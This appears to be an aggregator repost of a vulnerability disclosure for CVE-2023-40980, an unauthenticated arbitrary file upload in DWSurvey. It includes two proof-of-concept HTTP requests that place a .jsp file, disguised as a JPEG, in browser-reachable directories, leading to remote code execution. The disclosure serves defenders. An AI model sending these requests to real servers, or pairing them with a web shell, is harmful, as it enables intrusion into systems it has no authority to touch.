Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-40980: Arbitrary file uploads exist · Issue #107 · wkeyuan/DWSurvey

File Upload vulnerability in DWSurvey DWSurvey-OSS v.3.2.0 and before allows a remote attacker to execute arbitrary code via the saveimage method and savveFile in the action/UploadAction.java file.

CVE
Open in Source
#vulnerability#web#windows#js#java#rce#auth#webkit#firefox

``The saveimage method and saveFile in the com/key/common/base/action/UploadAction.java file can directly upload any type of file without authorization

For the saveimage method, this method can be directly called without authorization to upload any specified type of file to the /file/images/ directory, and this directory can be accessed through a browser normally, so malicious files can be uploaded for remote code execution

`POST /diaowen/up/upload!saveimage.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Connection: close
Content-Length: 395
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde–
`

Similarly, for the saveFile method, this method can also be directly called without authorization to upload any specified type of file to the directory specified by basepath under the /file directory, and this directory can be accessed through the browser normally, so malicious files can be uploaded file for remote code execution

`POST /diaowen/up/upload!saveFile.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 489
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary12345abcde
Accept-Encoding: gzip, deflate

------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="basepath"

files
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadify"; filename="1.jsp"
Content-Type: image/jpeg

testnixxx
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyFileName"

1.jpg
------WebKitFormBoundary12345abcde
Content-Disposition: form-data; name="uploadifyContentType"

image/jpeg
------WebKitFormBoundary12345abcde–
`

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE